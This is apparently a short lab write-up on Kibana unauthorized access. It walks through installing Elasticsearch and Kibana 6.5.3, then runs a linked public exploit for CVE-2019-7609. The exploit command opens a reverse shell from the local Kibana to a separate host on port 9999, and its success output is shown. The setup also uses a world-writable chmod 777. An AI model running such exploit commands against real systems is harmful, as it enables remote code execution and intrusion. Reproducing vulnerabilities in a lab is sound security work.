# Unauthorized Access Vulnerability in Kibana

## Vulnerability Description

The Kibana Unauthorized Access Vulnerability refers to a situation where, without proper authentication and authorization configuration, an unauthenticated user can access Kibana's dashboard, data, and other sensitive information. This vulnerability may result in data leaks, attackers controlling the Kibana environment, and other security threats.

## Environment Setup

Install elasticsearch

```
cd /opt
wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-6.5.3.tar.gz
tar -zxvf elasticsearch-6.5.3.tar.gz
cd elasticsearch-6.5.3
useradd es
chmod 777 -R /opt/elasticsearch-6.5.3
./bin/elasticsearch
```

![image-20220726162834227](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-cdd8fd0b2f41becd9b45e95da7145700c8d2931f%2Fimage-20220726162834227.png?alt=media)

Install kibana

```
wget https://artifacts.elastic.co/downloads/kibana/kibana-6.5.3-linux-x86_64.tar.gz
tar xvf kibana-6.5.3-linux-x86_64.tar.gz
cd kibana-6.5.3-linux-x86_64
./bin/kibana
```

Access port 5601 in a browser.

![image-20220726163136064](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-2670d096d2bc9fa23ca9309562e53c851b7184e8%2Fimage-20220726163136064.png?alt=media)

## Vulnerability Exploitation

exp：<https://github.com/LandGrey/CVE-2019-7609>

```
[root@localhost CVE-2019-7609-master]# python CVE-2019-7609-kibana-rce.py -u 127.0.0.1:5601 -host 192.168.32.130 -port 9999 --shell
[+] http://127.0.0.1:5601 maybe exists CVE-2019-7609 (kibana < 6.6.1 RCE) vulnerability
[+] reverse shell completely! please check session on: 192.168.32.130:9999
```

![image-20230130131026778](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-490bf31aac2e7258e263e23dc3d03915981caf89%2Fimage-20230130131026778.png?alt=media)